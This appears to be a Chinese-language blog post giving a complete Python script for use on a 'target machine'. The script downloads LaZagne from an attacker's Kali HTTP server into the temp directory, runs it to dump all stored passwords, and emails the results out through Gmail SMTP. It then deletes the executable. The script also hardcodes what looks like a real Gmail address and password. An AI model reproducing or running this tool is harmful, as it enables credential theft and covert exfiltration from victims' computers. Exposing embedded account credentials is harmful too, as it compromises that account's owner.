利用Python实现文件下载、执行文件并上报执行结果
应用场景:在Kali Linux本地启用HTTP服务器,并准备好相关的可执行文件,如可以获取用户信息的lazagne.exe,当下载到目标机器后,执行该文件,并将结果通过邮件进行上报。
主要步骤:
1. 利用requests模块实现文件下载(以及文件名称的自动提取)
2. 利用subprocess模块实现命令的执行
3. 利用smtplib模块实现邮件的发送
import subprocess import smtplib from email.mime.text import MIMEText from email.header import Header import sys import re import requests import os import tempfile """ Get all profiles Get password for each profile Email Send """ def download_file(url): print(url) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' } filename = url.split("/")[-1] try: response = requests.get(url, headers=headers).content print("Downloaded successfully!") with open(filename, 'wb') as f: f.write(response) except: pass def execute_command(command): try: result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) return result except: pass def send_email(username, password, result): try: message = MIMEText(result,'plain','utf-8') message['From'] = Header(username, 'utf-8') message['To'] = Header(username, 'utf-8') mail_server = smtplib.SMTP("smtp.gmail.com",587) mail_server.starttls() mail_server.login(username, password) mail_server.sendmail(username, username, message.as_string()) print("Successfully to send!") except: pass if __name__ == "__main__": username = 'junhua.wong.2013@gmail.com' password = '762326&^@#@^' url = 'http://192.168.140.138:8000/lazagne.exe' filename = url.split('/')[-1] command = filename+ ' all' temp_dir = tempfile.gettempdir() #获得目标机器的临时目录,并切换到该临时目录 os.chdir(temp_dir) download_file(url) result = execute_command('lazagne.exe all') if result is None: sys.exit() send_email(username, password, result) try: os.remove(filename) except: pass
STRIVE FOR PROGRESS,NOT FOR PERFECTION
